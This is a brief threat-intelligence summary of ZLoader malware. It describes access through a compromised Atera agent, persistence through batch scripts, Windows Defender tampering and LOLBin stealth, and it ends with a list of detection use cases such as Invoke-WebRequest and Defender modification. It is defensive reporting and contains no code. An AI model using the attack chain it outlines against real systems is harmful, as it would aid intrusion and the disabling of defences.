January 05, 2022


Industry: N/A | Level: Operational | Source: CheckPoint

Research provided by Golan Cohen from CheckPoint Research identifies new activity with ZLoader malware. The malware utilizes compromised remote software management – Atera for initial access. Following the agent install, batch scripts are executed to setup persistence and modify properties of windows defender. The malware attempts to utilize stealth utilizing many LOLBin binaries.

  • Anvilogic Scenario: ZLoader Installation
  • Anvilogic Use Cases:
    • MSIExec Install MSI File
    • Executable Create Script Process
    • Modify Windows Defender
    • Invoke-WebRequest Command